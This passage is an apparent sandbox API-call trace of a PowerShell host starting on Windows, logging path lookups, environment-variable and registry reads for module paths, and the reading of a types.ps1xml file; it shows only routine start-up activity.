lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0060.138] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0060.184] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0060.184] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0060.185] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0060.185] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0060.185] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0060.185] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0060.191] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0060.191] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d6d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0060.191] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d6d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0060.191] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d6d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0060.267] SetConsoleCtrlHandler (HandlerRoutine=0x2a8677c, Add=1) returned 1 [0060.317] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x31c [0060.319] CoCreateGuid (in: pguid=0x24dd50 | out: pguid=0x24dd50*(Data1=0xc4edaa27, Data2=0xd76c, Data3=0x4162, Data4=([0]=0x9a, [1]=0x9b, [2]=0x34, [3]=0xae, [4]=0x19, [5]=0x22, [6]=0xb, [7]=0xea))) returned 0x0 [0060.331] CoTaskMemAlloc (cb=0x104) returned 0x1b96d2f0 [0060.331] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96d2f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0060.331] CoTaskMemFree (pv=0x1b96d2f0) [0060.472] WinSqmIsOptedIn () returned 0x0 [0060.473] CoTaskMemAlloc (cb=0x104) returned 0x1b96d2f0 [0060.473] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96d2f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0060.473] CoTaskMemFree (pv=0x1b96d2f0) [0060.481] CoTaskMemAlloc (cb=0x104) returned 0x1b96d2f0 [0060.481] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96d2f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0060.481] CoTaskMemFree (pv=0x1b96d2f0) [0060.482] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96d2f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0060.482] CoTaskMemFree (pv=0x1b96d2f0) [0060.498] CoTaskMemAlloc (cb=0x104) returned 0x1b96d2f0 [0060.498] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96d2f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0060.498] CoTaskMemFree (pv=0x1b96d2f0) [0060.500] CoTaskMemAlloc (cb=0x104) returned 0x1b96d2f0 [0060.500] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96d2f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0060.500] CoTaskMemFree (pv=0x1b96d2f0) [0060.522] CoTaskMemAlloc (cb=0x104) returned 0x1b96d2f0 [0060.522] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96d2f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0060.522] CoTaskMemFree (pv=0x1b96d2f0) [0060.523] CoTaskMemAlloc (cb=0x104) returned 0x1b96d2f0 [0060.524] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96d2f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0060.524] CoTaskMemFree (pv=0x1b96d2f0) [0060.525] CoTaskMemAlloc (cb=0x104) returned 0x1b96d2f0 [0060.525] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96d2f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0060.525] CoTaskMemFree (pv=0x1b96d2f0) [0060.528] CoTaskMemAlloc (cb=0x104) returned 0x1b96d2f0 [0060.528] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96d2f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0060.528] CoTaskMemFree (pv=0x1b96d2f0) [0060.547] CoTaskMemAlloc (cb=0x104) returned 0x1b96d2f0 [0060.547] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96d2f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0060.575] CoTaskMemAlloc (cb=0x104) returned 0x1b96d2f0 [0060.575] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96d2f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0060.576] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96d2f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0061.049] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0061.049] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0061.050] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0061.050] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0061.138] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0061.139] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0061.139] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0061.139] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0061.139] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0061.140] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0061.140] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0061.140] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0061.140] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0061.141] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0061.141] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0061.141] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0061.146] CoTaskMemAlloc (cb=0x104) returned 0x1b96d2f0 [0061.146] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x1b96d2f0, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33 [0061.146] CoTaskMemFree (pv=0x1b96d2f0) [0061.151] CoTaskMemAlloc (cb=0xcc) returned 0x1b96b8e0 [0061.151] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b96b8e0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34 [0061.151] CoTaskMemFree (pv=0x1b96b8e0) [0061.151] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d8c8 | out: phkResult=0x24d8c8*=0x324) returned 0x0 [0061.151] RegQueryValueExW (in: hKey=0x324, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x24d84c, lpData=0x0, lpcbData=0x24d848*=0x0 | out: lpType=0x24d84c*=0x2, lpData=0x0, lpcbData=0x24d848*=0x6c) returned 0x0 [0061.152] CoTaskMemAlloc (cb=0x70) returned 0xe54e0 [0061.152] RegQueryValueExW (in: hKey=0x324, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x24d81c, lpData=0xe54e0, lpcbData=0x24d818*=0x6c | out: lpType=0x24d81c*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x24d818*=0x6c) returned 0x0 [0061.152] CoTaskMemFree (pv=0xe54e0) [0061.152] CoTaskMemAlloc (cb=0xcc) returned 0x1b96b8e0 [0061.152] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x1b96b8e0, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb [0061.152] CoTaskMemFree (pv=0x1b96b8e0) [0061.152] CoTaskMemAlloc (cb=0xcc) returned 0x1b96b8e0 [0061.152] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b96b8e0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34 [0061.153] CoTaskMemFree (pv=0x1b96b8e0) [0061.156] RegCloseKey (hKey=0x324) returned 0x0 [0061.156] CoTaskMemAlloc (cb=0xcc) returned 0x1b96b8e0 [0061.156] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b96b8e0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34 [0061.156] CoTaskMemFree (pv=0x1b96b8e0) [0061.156] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d8c8 | out: phkResult=0x24d8c8*=0x324) returned 0x0 [0061.156] RegQueryValueExW (in: hKey=0x324, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x24d84c, lpData=0x0, lpcbData=0x24d848*=0x0 | out: lpType=0x24d84c*=0x0, lpData=0x0, lpcbData=0x24d848*=0x0) returned 0x2 [0061.156] RegCloseKey (hKey=0x324) returned 0x0 [0061.193] CoTaskMemAlloc (cb=0x20c) returned 0x152b20 [0061.193] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x152b20 | out: pszPath="C:\\Users\\aETAdzjz\\Documents") returned 0x0 [0061.194] CoTaskMemFree (pv=0x152b20) [0061.194] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x24d450, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b [0061.195] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1 [0061.234] CoTaskMemAlloc (cb=0x104) returned 0x1b96d2f0 [0061.234] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96d2f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0061.234] CoTaskMemFree (pv=0x1b96d2f0) [0061.236] CoTaskMemAlloc (cb=0x104) returned 0x1b96d2f0 [0061.236] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96d2f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0061.237] CoTaskMemFree (pv=0x1b96d2f0) [0061.257] CoTaskMemAlloc (cb=0x104) returned 0x1b96d2f0 [0061.257] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96d2f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0061.257] CoTaskMemFree (pv=0x1b96d2f0) [0061.257] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96d2f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0061.257] CoTaskMemFree (pv=0x1b96d2f0) [0061.261] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d6b8 | out: phkResult=0x24d6b8*=0x32c) returned 0x0 [0061.269] RegQueryValueExW (in: hKey=0x32c, lpValueName="path", lpReserved=0x0, lpType=0x24d6cc, lpData=0x0, lpcbData=0x24d6c8*=0x0 | out: lpType=0x24d6cc*=0x1, lpData=0x0, lpcbData=0x24d6c8*=0x74) returned 0x0 [0061.270] RegQueryValueExW (in: hKey=0x32c, lpValueName="path", lpReserved=0x0, lpType=0x24d63c, lpData=0x0, lpcbData=0x24d638*=0x0 | out: lpType=0x24d63c*=0x1, lpData=0x0, lpcbData=0x24d638*=0x74) returned 0x0 [0061.270] CoTaskMemAlloc (cb=0x78) returned 0xe54e0 [0061.270] RegQueryValueExW (in: hKey=0x32c, lpValueName="path", lpReserved=0x0, lpType=0x24d60c, lpData=0xe54e0, lpcbData=0x24d608*=0x74 | out: lpType=0x24d60c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x24d608*=0x74) returned 0x0 [0061.270] CoTaskMemFree (pv=0xe54e0) [0061.270] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x24d380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a [0061.270] SetErrorMode (uMode=0x1) returned 0x1 [0061.270] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x24d590 | out: lpFileInformation=0x24d590*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0061.270] SetErrorMode (uMode=0x1) returned 0x1 [0061.272] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x24d380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0061.272] SetErrorMode (uMode=0x1) returned 0x1 [0061.273] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24d590 | out: lpFileInformation=0x24d590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1 [0061.273] SetErrorMode (uMode=0x1) returned 0x1 [0061.277] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x24d380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0061.277] SetErrorMode (uMode=0x1) returned 0x1 [0061.277] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24d590 | out: lpFileInformation=0x24d590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1 [0061.278] SetErrorMode (uMode=0x1) returned 0x1 [0061.282] CoTaskMemAlloc (cb=0x104) returned 0x1b96d2f0 [0061.282] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96d2f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0061.285] CoTaskMemAlloc (cb=0x104) returned 0x1b96d2f0 [0061.285] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96d2f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0061.286] GetACP () returned 0x4e4 [0061.306] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x24cf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0061.306] SetErrorMode (uMode=0x1) returned 0x1 [0061.307] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x330 [0061.308] GetFileType (hFile=0x330) returned 0x1 [0061.308] SetErrorMode (uMode=0x1) returned 0x1 [0061.309] GetFileType (hFile=0x330) returned 0x1 [0061.310] ReadFile (in: hFile=0x330, lpBuffer=0x2f4ae88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2f4ae88*, lpNumberOfBytesRead=0x24d4c8*=0x1000, lpOverlapped=0x0) returned 1 [0061.324] ReadFile (in: hFile=0x330, lpBuffer=0x2f4ae88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2f4ae88*, lpNumberOfBytesRead=0x24d4c8*=0x1000, lpOverlapped=0x0) returned 1 [0061.324] ReadFile (in: hFile=0x330, lpBuffer=0x2f4ae88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2f4ae88*, lpNumberOfBytesRead=0x24d4c8*=0x1000, lpOverlapped=0x0) returned 1 [0061.325] ReadFile (in: hFile=0x330, lpBuffer=0x2f4ae88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2f4ae88*, lpNumberOfBytesRead=0x24d4c8*=0xcf3, lpOverlapped=0x0) returned 1 [0061.325] ReadFile (in: 